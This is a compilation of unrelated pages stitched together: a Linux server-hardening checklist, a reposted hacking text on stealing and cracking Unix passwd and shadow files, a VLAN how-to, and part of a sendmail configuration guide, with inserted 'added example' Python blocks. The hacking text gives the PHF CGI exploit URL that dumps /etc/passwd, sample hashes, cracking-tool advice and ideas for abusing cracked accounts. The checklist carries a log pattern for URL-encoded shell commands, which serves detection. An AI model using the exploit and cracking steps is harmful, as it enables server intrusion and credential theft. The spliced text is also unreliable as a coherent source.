90. Find directory with 777 permission.

              find . -type d -perm 777

91. Check for open ports using the nmap command.

92. Disable identification output for Apache

To disable the version output for Apache, SSH into the server and log in as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type: /etc/rc.d/init.d/httpd restart

93. Change the ssh ListenAddress in /etc/ssh/sshd_config

94. Set PermitRootLogin no in /etc/ssh/sshd_config

95. Add a root login alert

vi .bash_profile

   echo 'ALERT - Root Shell Access on:' `date` `who` | \
       mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96. Set an SSH legal message in /etc/motd

97. Use locate to search for files that should not be on the server:

   locate shell.php
   locate irc
   locate eggdrop
   locate bnc
   locate BNC
   locate ptlink
   locate BitchX
   locate guardservices
   locate psyBNC
   locate .rhosts

98. Perform UDP and TCP scans from outside using this site:

http://www.hackerwatch.org/probe/

This site is not bad either: https://grc.com/x/ne.dll?bh0bkyd2

99. Check /var/log/secure, /var/log/messages and the other log files of running services to see if there are any issues.

100. Check your box to see if performance has degraded or if the machine is being overused.

For that, use the commands

vmstat

    Displays information about memory, cpu and disk.
    Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

    Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
    Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

    This command displays statistics about the disk system.
    Useful options:
    -d - Gives the device utilization report.
    -k - Display statistics in kilobytes per second.
    Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

    Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

    Displays the status of all known processes.

lsof

    Lists all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

101. Other checks:

    * chmod -R 700 /etc/rc.d/init.d/*
    * Use rpm -Va to find out if an rpm-installed file has been modified
    * Apply security patches to vulnerable software (e.g. patch -p1 < patchfile)
    * Remove all unneeded ttys and console logins by removing the entries from /etc/securetty
    * Check system logs (e.g. /var/log/messages, /var/log/secure, etc.)
    * Set a password on the boot loader (lilo and grub both support this)
    * Monitor the system (nagios or big brother)

102. Install AIDE (Advanced Intrusion Detection Environment), a free replacement for Tripwire: http://www.cs.tut.fi/~rammer/aide.html

103. Testing phase when in production.

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test.

        

Search the Apache domain logs for URL-encoded shell commands:

find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;
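The find/egrep one-liner above looks for URL-encoded shell commands in the Apache domain logs. The following added example (not from the post) does the same over parsed combined-format log lines: it decodes the percent-encoding first and anchors the command names at a word start, so ordinary words ending in "sh" or "cd" do not trip it, which the bare pattern above would. The log lines are constructed; the addresses are documentation ranges and the hostnames are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines: two command-injection attempts
# and two legitimate requests whose paths happen to contain "sh%20".
ACCESS_LOG = """\
203.0.113.7 - - [04/Aug/2010:10:12:01 +0000] "GET /index.php?page=http://evil.example/x.txt?&cmd=cd%20/tmp;wget%20http://evil.example/bd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Aug/2010:10:12:05 +0000] "GET /cgi-bin/view.cgi?f=;perl%20-e%20'print' HTTP/1.1" 500 230 "-" "curl/7.19"
192.0.2.44 - - [04/Aug/2010:10:13:10 +0000] "GET /search?q=fresh%20fish HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.45 - - [04/Aug/2010:10:13:12 +0000] "GET /docs/ssh%20keys.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# The command names from the post's egrep pattern, matched after percent-decoding
# and only where the name starts a word, so "fresh fish" and "ssh keys" are not hits.
CMD_RE = re.compile(r"(?<![\w./-])(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch) ", re.IGNORECASE)


def suspicious_requests(text):
    """Return one dict per request whose decoded URL carries a shell command followed by a space."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(m["target"])
        commands = sorted({c.lower() for c in CMD_RE.findall(decoded)})
        if commands:
            hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "target": decoded, "commands": commands})
    return hits


if __name__ == "__main__":
    for h in suspicious_requests(ACCESS_LOG):
        print(f"{h['ip']} {h['time']} {h['status']} {','.join(h['commands'])} {h['target']}")
```

The HTTP status is kept in each hit on purpose: a 200 on a request like the first constructed line is far more worrying than a 404, and it is the first thing to sort on when the list is long.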

 [***The Ultimate Guide Passwd Files***]

CONTENTS
1. Introduction
2. What is a Passwd File?
3. PHF Exploit
4. FTP Passwd
5. Shadowed Passwds
6. Crackers
7. Wordlists
8. Using Cracked Passwds
________________________________________________________

1. Introduction

Passwd files are the easiest and simplest way to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on to the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activities. If you choose to do illegal activities with the information from this it is no one's fault but your own. Now down to the good stuff [=.

________________________________________________________

2. What is a Passwd File

A passwd file is an encrypted file that contains the passwords of the users on a server. The key word here is encrypted, so don't start thinking all I have to do is find one and I hit the jackpot. Nope, sorry man, there's a lot more to it than that. The passwd file should look something like this:

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid nobody:/:
noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc

Out of that entire section the only name you could use would be rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc. Here's how you read the file:

rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc
Username: rrc
Encrypted Password: uXDg04UkZgWOQ
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh

Because it is the only name with an encrypted password. You will never find a passwd file that has a passwd for anything like ftp, listen, bin, etc., etc. Occasionally, using the PHF exploit or unshadowing a passwd file, you can get an encrypted password for root.
________________________________________________________

3. PHF Exploit

First let me explain what an exploit is. An exploit is a hole in software that allows someone to get something out of it that... well, you aren't supposed to.
The PHF exploit is a hole in CGI that most servers have fixed now (if they have CGI). Let's just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many foreign servers have this open. Unlike the FTP passwd, you don't even have to access their FTP or log in. What you do is get a WWW browser and then in the place for the WWW address type:
http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd
In http://www.target.com place whoever's passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it." it's not there. If you get "You have been caught on Candid Camera!" they caught you, but don't fear, they rarely ever report you. I have yet to find a server that does report. Of course if you get "root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0: 
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing 
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh”
You have hit the jackpot [=. Save the file as a text and keep it handy, because you will need it for later in the lesson. 

________________________________________________________________

4. FTP Passwd

The passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous-logins rule. If you are desperate to get a passwd file from a certain server (which may not even be open, so only do this if you are desperate or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the server's name and connect to it. You should get a list of directories like "etc, hidden, incoming, pub"; go to the one called etc. Inside etc should be a few files like "group, passwd"; if by any chance you see one called shadow there is an 8/10 chance you are about to deal with a shadowed passwd. Well, get the passwd file and maybe check out what else is on the server so it won't look so suspicious. Anyway, when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:) with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention, if you have something that has a few things that look like:
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
you have gotten one you can crack [=.
________________________________________________________________

5. Shadowed Passwds

Now if you happen to find a passwd file that looks something like this: "joetest:*:102:100::/home/joetest:/usr/bin/restsh"
which has a user name, not a program's, you have a shadowed passwd. The shadow file has the encrypted passwords in it. Depending on the operating system, the passwd file may be in different places. To find out what operating system your target is running, from telnet (connected to that server of course) type uname -a and it should say; if you cannot get to telnet there are other methods of finding out. Here is a guide to systems' passwd file locations (taken from a text on passwd files by Kryto). A token is the * (or other symbol) beside a shadowed passwd's user name.

UNIX Paths (Courtesy of 2600)

UNIX                   Path                                                    Token
----------------------------------------------------------------------------------
AIX 3                  /etc/security/passwd                                    !
                       or /tcb/auth/files/<first letter                        #
A/UX 3.0s              /tcb/files/auth/?/                                      *
BSD4.3-Reno            /etc/master.passwd                                      *
ConvexOS 10            /etc/shadpw                                             *
ConvexOS 11            /etc/shadow                                             *
DG/UX                  /etc/tcb/aa/user/                                       *
EP/IX                  /etc/shadow                                             x
HP-UX                  /.secure/etc/passwd                                     *
IRIX 5                 /etc/shadow                                             x
Linux 1.1              /etc/shadow                                             *
OSF/1                  /etc/passwd[.dir|.pag]                                  *
SCO Unix #.2.x         /tcb/auth/files/<first letter of username>/<username>   *
SunOS4.1+c2            /etc/security/passwd.adjunct                            ##username
SunOS 5.0              /etc/shadow                                             <optional NIS+ private secure maps/tables/whatever>
System V Release 4.0   /etc/shadow                                             x
System V Release 4.2   /etc/security/* database
Ultrix 4               /etc/auth[.dir|.pag]                                    *
UNICOS                 /etc/udb                                                *

Anyway, once you have the passwd file (with user names) and the shadow file, you can find an unshadowing program, which combines the passwd file and the shadow file into what a regular passwd file would be. An unshadowing program can be found at http://www.hackersclub.com/km/downloads/password_cracker/ucfjohn2.zip Now some servers have the shadow file under restrictions so no one without a special account on the server can get to it.
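From the administrator's side, the check that follows from sections 2 and 5 of this text is to audit one's own /etc/passwd for entries that still carry a password hash in the second field (the case the text calls "one you can crack"), for empty password fields, and for extra UID 0 accounts. The following is an added example (not part of the original text); the passwd content is constructed, modelled on the sample entries quoted above, and the parser rejects malformed lines rather than guessing.

```python
# Constructed /etc/passwd content modelled on the sample entries quoted in this
# text: shadowed accounts, one account whose hash is still in field 2, one with
# an empty password field, and a second UID 0 account.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
bin:x:2:2:bin:/bin:/sbin/nologin
ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/ksh
guest::502:502:Guest:/home/guest:/bin/bash
toor:x:0:0:second root:/root:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
# Values that mean "look in /etc/shadow" or "locked"; anything else in field 2 is a hash.
SHADOW_TOKENS = {"x", "*", "!", "!!", "!*", "*LK*"}


def parse_passwd(text):
    """Split passwd lines into dicts keyed by the seven field names."""
    users = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"line {n}: expected 7 colon-separated fields, got {len(parts)}")
        users.append(dict(zip(FIELDS, parts)))
    return users


def audit_passwd(text):
    """Report hashes left in passwd, empty password fields and extra UID 0 accounts."""
    findings, users = [], parse_passwd(text)
    for u in users:
        pw = u["passwd"]
        if pw == "":
            findings.append(f"{u['name']}: empty password field, login needs no password")
        elif pw not in SHADOW_TOKENS and not pw.startswith("!"):
            findings.append(f"{u['name']}: password hash stored in world-readable passwd, not in shadow")
    for u in users:
        if u["uid"] == "0" and u["name"] != "root":
            findings.append(f"{u['name']}: additional UID 0 account")
    return findings


if __name__ == "__main__":
    for f in audit_passwd(PASSWD) or ["passwd looks clean"]:
        print(f)
```

On a live system, run it as `python3 audit_passwd.py` after changing the constant to `open("/etc/passwd").read()`; pwconv moves any hash it finds into /etc/shadow, and a second UID 0 account should be explained or removed.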
________________________________________________________________

6. Crackers

Now that you have gotten a passwd file, what the hell do you do with it to get passwords from it? That's where crackers come in.
A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd file's encrypted passwds. I have used many different crackers. Everyone has their favorite. My personal favorite is one called PaceCrack95 Ver. 1.1
http://tms.netrom.com/~cassidy/utils/pacec.zip
Many people swear that John the Ripper is the greatest, but I have problems with it; it can be gotten off any decent hacking page. Same for Cracker Jack. A cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don't need to write it down because the program auto-saves it. Cracker Jack saves the file as jack.pot and I think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the file's name (ex., passwd.txt.db) with the exact name and makes it a .DB file. I like to keep a passwd file once I have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works or if it is fake. It helps [=.
___________________________________________________________________________

7. Wordlists 

Wordlists are a necessity to cracking passwd files. They are just huge lists of words. The biggest wordlist is available from here: ftp://ftp.ox.ac.uk/pub/wordlists/ 
If you get a passwd file from another country, get a wordlist in the same language as the country the passwd file came from, as the users would probably use words they are familiar with [=. There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completely saying they are useless since I have cracked a password with one before; I had fashioned my own list of 4 digit numbers since people might use their phone number and well it worked [=. 
____________________________________________________________________________

8. What to do with a Cracked Passwd file

What you can do with a passwd is up to you. The nice thing to do is inform the administrator of the server that accounts on his (or her) server are insecure and possibly open to anyone hacking an account and bringing havoc upon their server. Some other things you can do is fire up good ole telnet and connect to one of their ports and see what you could do with that account. The possibilities are endless. You could hack a webpage (I wouldn't do that on account of how lame it is to destroy someone's piece of work.)
You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is canceled you can use a hacked account's dial-up till you purchase a new one. Like I said the list goes on and on. I am sure no one wants you doing anything destructive (it's lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out, he won't freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fulfill your needs [=. Goat

From: http://crack0hack.wetpaint.com/page/[***The+Ultimate+Guide+Passwd+Files***]

VLAN ON LINUX

Posted: January 28, 2009 in LINUX, Linux Server

Howto: Configure Linux Virtual Local Area Network 

 

VLAN is an acronym for Virtual Local Area Network. Several VLANs can co-exist on a single physical switch; on the Linux side they are configured via software (Linux commands and configuration files) rather than through a hardware interface (you still need to configure the switch).

Hubs or switches connect all nodes in a LAN, and those nodes can communicate without a router. For example, all nodes in LAN A can communicate with each other without the need for a router. If a node from LAN A wants to communicate with a node in LAN B, you need to use a router. Therefore, the LANs (A, B, C and so on) are separated by a router.

As the name suggests, a VLAN lets several logical LANs share one physical network at once. But what are the advantages of VLANs?

  • Performance
  • Ease of management
  • Security
  • Trunks
  • You don’t have to configure any hardware device, when physically moving server computer to another location etc.

VLAN concepts and fundamentals are beyond the scope of this article. I am reading the following textbooks, which I found extremely useful and highly recommend:

  • Cisco CCNA ICND books (part I and II)
  • Andrew S. Tanenbaum, Computer Networks

Linux VLAN Configuration Issue

I am lucky enough to have got a couple of hints from our internal wiki docs :D.

  • Not all network drivers support VLANs. You may need to patch your driver.
  • MTU may be another problem. 802.1Q works by tagging each frame, i.e. an Ethernet header extension that enlarges the header from 14 to 18 bytes; a driver that cannot pass frames 4 bytes larger than the usual maximum loses 4 bytes of usable MTU. The VLAN tag contains the VLAN ID and priority. See the Linux VLAN site for patches and other information.
  • Do not use VLAN ID 1 as it may be used for admin purposes.

Linux VLAN How To

My VLAN ID is 5, so I need to copy the file /etc/sysconfig/network-scripts/ifcfg-eth0 to /etc/sysconfig/network-scripts/ifcfg-eth0.5:

# cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.5
Now I have one network card (eth0) and it needs to carry tagged network traffic for VLAN ID 5:

  • eth0 – your regular (physical) network interface
  • eth0.5 – your virtual interface, which sends and receives frames tagged with VLAN ID 5

Do not modify the /etc/sysconfig/network-scripts/ifcfg-eth0 file. Now open /etc/sysconfig/network-scripts/ifcfg-eth0.5 in the vi text editor:
# vi /etc/sysconfig/network-scripts/ifcfg-eth0.5
Find the DEVICE=eth0 line and replace it with:
DEVICE=eth0.5
Append the line:
VLAN=yes
Also make sure you assign the correct IP address, via DHCP or a static address. Save the file. Remove the gateway entry from all other network config files and add the gateway only to /etc/sysconfig/network. Save and close the file. Restart networking:
# /etc/init.d/network restart
Please note that if you also need to configure VLAN ID 2, copy /etc/sysconfig/network-scripts/ifcfg-eth0 to /etc/sysconfig/network-scripts/ifcfg-eth0.2 and repeat the procedure above.
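As an added illustration of the ifcfg steps above (example code written for this page, not part of the original post), the Python helper below derives an ifcfg-eth0.5 file from a constructed ifcfg-eth0 following the rules just given: DEVICE gets the .5 suffix, VLAN=yes is appended, the GATEWAY line is dropped so that it lives only in /etc/sysconfig/network, and the address is replaced so the sub-interface does not reuse the parent's IP. A second function checks a finished file for the mistakes that most often break a VLAN sub-interface. The sample file contents, addresses and function names are assumptions made for the example.

```python
import re

# A VLAN sub-interface is named <parent>.<id>, e.g. eth0.5. "ifcfg-eth0.5" is
# the file name, not the device name, so the regex rejects it.
DEVICE_RE = re.compile(r"^([a-z][a-z0-9]*)\.(\d+)$")


def parse_ifcfg(text):
    """Parse the KEY=VALUE lines of a Red Hat ifcfg file, keeping their order."""
    entries = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        key, _, value = stripped.partition("=")
        entries.append((key.strip(), value.strip().strip('"')))
    return entries


def make_vlan_ifcfg(base_text, vlan_id, ipaddr=None):
    """Derive ifcfg-<dev>.<vlan_id> from the parent's ifcfg text as the post
    describes: DEVICE gets the .<id> suffix, VLAN=yes is appended, GATEWAY is
    dropped (it belongs in /etc/sysconfig/network) and IPADDR can be replaced."""
    if not 1 <= vlan_id <= 4094:
        raise ValueError("VLAN ID must be 1..4094 (0 and 4095 are reserved)")
    entries = parse_ifcfg(base_text)
    keys = dict(entries)
    if "DEVICE" not in keys:
        raise ValueError("base ifcfg file has no DEVICE= line")
    out = []
    for key, value in entries:
        if key == "DEVICE":
            value = "%s.%d" % (keys["DEVICE"], vlan_id)
        elif key == "IPADDR" and ipaddr:
            value = ipaddr
        elif key in ("GATEWAY", "VLAN"):
            continue   # gateway moves out; VLAN= is re-added exactly once below
        out.append((key, value))
    out.append(("VLAN", "yes"))
    return "".join("%s=%s\n" % kv for kv in out)


def check_vlan_ifcfg(text):
    """Return a list of problems found in a VLAN sub-interface ifcfg file."""
    keys = dict(parse_ifcfg(text))
    problems = []
    match = DEVICE_RE.match(keys.get("DEVICE", ""))
    if not match:
        problems.append("DEVICE must be <parent>.<vlan-id> such as eth0.5, not %r"
                        % keys.get("DEVICE"))
    elif not 1 <= int(match.group(2)) <= 4094:
        problems.append("VLAN ID %s is out of range" % match.group(2))
    elif int(match.group(2)) == 1:
        problems.append("VLAN ID 1 is usually reserved for switch management")
    if keys.get("VLAN", "").lower() != "yes":
        problems.append("VLAN=yes is missing, so ifup will not create the tagged sub-interface")
    if "GATEWAY" in keys:
        problems.append("GATEWAY belongs in /etc/sysconfig/network, not in this file")
    return problems


# Constructed sample parent-interface file; the addresses are made up.
SAMPLE_IFCFG_ETH0 = """\
DEVICE=eth0
BOOTPROTO=static
IPADDR=192.168.1.100
NETMASK=255.255.255.0
GATEWAY=192.168.1.1
ONBOOT=yes
"""

if __name__ == "__main__":
    generated = make_vlan_ifcfg(SAMPLE_IFCFG_ETH0, 5, ipaddr="192.168.5.10")
    print(generated)
    print("problems in parent file:", check_vlan_ifcfg(SAMPLE_IFCFG_ETH0))
```

Running the checker against the unmodified parent file reports three problems (wrong DEVICE form, no VLAN=yes, GATEWAY present), which is exactly the list of edits the procedure asks for.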

Using the vconfig command

The above method is perfect and works with Red Hat Enterprise Linux / CentOS / Fedora Linux without any problem. However, you will notice that there is a command called vconfig. The vconfig program allows you to create and remove VLAN devices on a VLAN-enabled kernel. VLAN devices are virtual Ethernet devices which represent the virtual LANs on the physical LAN.

Please note that this is yet another method of configuring a VLAN. If you are happy with the method above, there is no need to read further.

Add VLAN ID 5 with the following command for eth0:
# vconfig add eth0 5

The vconfig add command creates a VLAN device on eth0, which results in the eth0.5 interface. You can use the normal ifconfig command to see device information:
# ifconfig eth0.5
Use ifconfig to assign an IP address to the VLAN interface:
# ifconfig eth0.5 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 up
Get detailed information about the VLAN interface:
# cat /proc/net/vlan/eth0.5
If you wish to delete the VLAN interface, bring it down and remove it:
# ifconfig eth0.5 down
# vconfig rem eth0.5

A VLAN is a "Virtual Local Area Network" and is present in L2 (Layer 2) of the protocol stack.

A host may be a server, workstation or other device which conforms to the 802.1q specification. Therefore, it is possible (with certain limitations) to attach a laptop to a VLAN seen by a server.

802.1q provides for an additional 4 bytes of information added to the L2 frame, 12 bits of which indicate the VLAN ID. Thus one may have 4K VLANs.
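To make the tag layout concrete, here is an added Python example (not from the original post) that inserts, parses and strips an 802.1Q tag on a raw Ethernet frame, checks that the 12-bit VLAN ID is in the usable range, and computes how the extra 4 bytes eat into the payload when a NIC driver keeps a fixed maximum frame size, which is the MTU problem noted earlier on this page. The sample frame, its MAC addresses and the 1518-byte frame limit are constructed for the example.

```python
import struct

ETHERTYPE_8021Q = 0x8100   # TPID value that marks a tagged frame
UNTAGGED_HDR_LEN = 14      # dst MAC (6) + src MAC (6) + EtherType (2)
TAGGED_HDR_LEN = 18        # the 802.1Q tag adds 4 bytes: TPID (2) + TCI (2)
FCS_LEN = 4                # trailing frame check sequence


def vid_usable(vid):
    """The VID is a 12-bit field (0..4095), but 0 (priority tag only) and 4095
    are reserved, leaving 1..4094. VID 1 is the default VLAN on most switches
    and, as the post notes, is best left for management."""
    return 1 <= vid <= 4094


def add_tag(frame, vid, pcp=0, dei=0):
    """Insert an 802.1Q tag between the source MAC and the original EtherType."""
    if not vid_usable(vid):
        raise ValueError("VLAN ID %d is outside the usable range 1..4094" % vid)
    if len(frame) < UNTAGGED_HDR_LEN:
        raise ValueError("frame too short to carry an Ethernet header")
    tci = ((pcp & 0x7) << 13) | ((dei & 0x1) << 12) | vid   # 3 + 1 + 12 bits
    tag = struct.pack("!HH", ETHERTYPE_8021Q, tci)
    return frame[:12] + tag + frame[12:]


def parse_tag(frame):
    """Return (pcp, dei, vid, inner_ethertype) for a tagged frame, else None."""
    if len(frame) < TAGGED_HDR_LEN:
        return None
    (tpid,) = struct.unpack("!H", frame[12:14])
    if tpid != ETHERTYPE_8021Q:
        return None
    tci, inner = struct.unpack("!HH", frame[14:18])
    return (tci >> 13, (tci >> 12) & 0x1, tci & 0x0FFF, inner)


def strip_tag(frame):
    """Remove the 4-byte tag, giving back the untagged frame."""
    if parse_tag(frame) is None:
        return frame
    return frame[:12] + frame[16:]


def max_payload(frame_limit=1518, tagged=True):
    """Payload bytes that still fit when a driver enforces a fixed maximum
    frame size: an untagged 1518-byte frame carries 1500 bytes, a tagged one
    only 1496 unless the driver grows its limit by the 4 tag bytes."""
    hdr = TAGGED_HDR_LEN if tagged else UNTAGGED_HDR_LEN
    return frame_limit - hdr - FCS_LEN


# Constructed sample: two made-up MAC addresses, EtherType 0x0800 (IPv4) and
# a four-byte dummy payload; not a captured frame.
SAMPLE_FRAME = (bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb")
                + struct.pack("!H", 0x0800) + b"\xde\xad\xbe\xef")

if __name__ == "__main__":
    tagged = add_tag(SAMPLE_FRAME, 5, pcp=3)
    print(len(SAMPLE_FRAME), "->", len(tagged), "bytes; tag =", parse_tag(tagged))
```

The parser only recognises the single-tag (TPID 0x8100) case described in the post; QinQ double tagging uses a different outer TPID and is not handled here.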

When you want to configure a VLAN in Linux, assuming your kernel supports it (2.6+ kernels do), you need to make sure 802.1q support is available. This is most easily done with modprobe, so the command:

/sbin/modprobe 8021q

should do the trick.

Then, for any given NIC interface you only have to do the following (<N> is the NIC number and <VLAN_ID> the VLAN ID):

/sbin/vconfig add eth<N> <VLAN_ID>
/sbin/ifconfig eth<N>.<VLAN_ID> 192.168.0.x netmask 255.255.255.0

Of course I just picked some arbitrary class C address; you would have to use what is appropriate for you.

You may then need to add to the routing table (not knowing what Linux you are running) something like:

/sbin/route add -net 192.168.0.0 netmask 255.255.255.0 eth<N>.<VLAN_ID>

ALL THE ABOVE MUST BE AS ROOT.

Virtual LAN configuration

You can create a VLAN on Linux by executing the following commands (<iface> is the physical interface, <vlan-id> the VLAN ID, <ip> and <mask> the address to assign):
vconfig add <iface> <vlan-id>
ifconfig <iface>.<vlan-id> <ip> netmask <mask>
ifconfig <iface>.<vlan-id> up

For example:
vconfig add eth0 6
ifconfig eth0.6 192.168.1.6 netmask 255.255.255.0
ifconfig eth0.6 up

You can view the configuration and traffic counters of that VLAN by executing the following command:

cat /proc/net/vlan/eth0.6

In the same way you can configure 2048 VLANs for one physical interface.

Advantages of VLANs

VLANs provide a number of benefits to a network designer. The first advantage is the number of devices required to implement a given network topology can be reduced. Without VLANs, if your network design requires ten machines divided into five different LANs, you would need five different switches or hubs, and most of the ports would be wasted. With VLANs, this work could be done with one device.

Most routers and standard computers can support a limited number of physical network interfaces. Although dual and quad-port Ethernet adapters are available, these are expensive. For example, a quad-port Ethernet card may cost $400. VLAN capable switches start at around $500, but they support many more interfaces.

Depending on the scenario, VLANs and trunks can provide an effective way of segmenting a network without the expense and complexity of managing many physical interfaces.

 

Sendmail Mods — Using Sendmail Correctly As an Internal Mail Handler

Modifying the sendmail.mc file for internal servers….

Listed below are the changes to a default RH 9 /etc/mail/sendmail.mc file required to operate a mail server behind a correctly configured Sendmail gateway server. These intranet servers can send mail to local users, users on the gateway server, and external Internet addresses. Why would you want to do this? There are many applications that utilize mail (sendmail) to send status information and data to you or other users. Some examples of such handy software include cron, apinger, and logwatch. However, you may not want to expose these internal machines to the outside world. The following details will allow you to use your gateway server as a relay.

Again, this is a specialized application of Sendmail. For a more general application, see our other page.

We will assume that your firewall will not let outsiders touch these internal servers on port 25. As such, several of the lock-down and anti-spam measures that were implemented on the gateway server will not be implemented here.

You are NOT done once you change the .mc file. There are other changes that need to be done to the server.

Anything not listed for change/add/delete here should work fine with the default settings. I do NOT know if this will work for any other installation (e.g. Red Hat 7.2 or Mandrake). This worked with the default sendmail RPM shipped with RH 9 (and subsequent sendmail updates). I gleaned some parts of this from several sources but one of your best resources is the published Red Hat documentation. RTFM. Red Hat has excellent manuals and you will find most of this stuff there.

Some hearty souls may choose to edit the sendmail.cf file directly; however, I do not see the need for this. The whole idea of the sendmail.mc file is to make the configuration file manageable and to generate the .cf file. When I dove into this, I read as much as I could, including the vaunted O'Reilly Bat Book. Everything I read said to stick with the macros (m4 and mc) and let them generate the .cf. I've played with both files from time to time and find the .mc to be much more manageable for my pea-brain. The sendmail.mc file is 145 lines, the sendmail.cf file is 1800 lines. You figure it out….

You will need to run make -C /etc/mail as root to generate the sendmail.cf file from the sendmail.mc macro after you are finished making these changes. You will also need to do a /sbin/service sendmail restart as root once you have made the new sendmail.cf file. More on this below.

Please let me know if you see any errors or omissions in this document. Also, note that I am well aware I am not saving the world here.


Some definitions:

Comment out: Place a dnl or a dnl # in front of the line in the macro file. This will cause the m4 compiler to ignore that line.

Uncomment: Remove the dnl or dnl # in front of the line in the macro file. There may also be changes after you uncomment.

Add: New lines that should be added just like they are shown.

Replace: Replace the existing line (which will be shown) with the new line.

Notes: These are listed in roughly the order they appear in the sendmail.mc file, not by importance. I suggest you read through them all and sort out the ones you need. Don’t change the order of things too much as the compiler can get picky if too many things are defined out of order. Also, they insist on using forward-single-quotes (`) which are a pain if you don’t notice them. It is best to copy existing lines and modify them so you don’t mix up the forward and standard quotes.


Modify the actual sendmail.mc file

1. The most important change you need to make is this first step. You must comment out the following line:

DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl

This will allow sendmail to make connections with machines other than the localhost. Duh. The reason for having this line included (turned on) by default will be left as an exercise for the reader.

2. Comment out the following line:

define(`UUCP_MAILER_MAX', `2000000')dnl

You don’t need this. Leave it if you like.

3. Comment out the following line:

FEATURE(local_procmail,`', `procmail -t -Y -a $h -d $u')dnl

You don’t need procmail for the simple stuff. Leave it or modify it if you like.

4. Comment out the following line:

EXPOSED_USER(`root')dnl

Leave it or modify it if you like.

5. Comment out the following line:

FEATURE(`accept_unresolvable_domains')dnl

If this line is NOT commented out, you will open yourself up to more spam as sendmail will not do one of its basic checks on the incoming MTA.

6. Another key change is to set up your gateway machine as your “null client”. This is done by the following add:

FEATURE(`nullclient',`[192.168.100.1]')dnl   (assuming your SMTP gateway machine is 192.168.100.1)

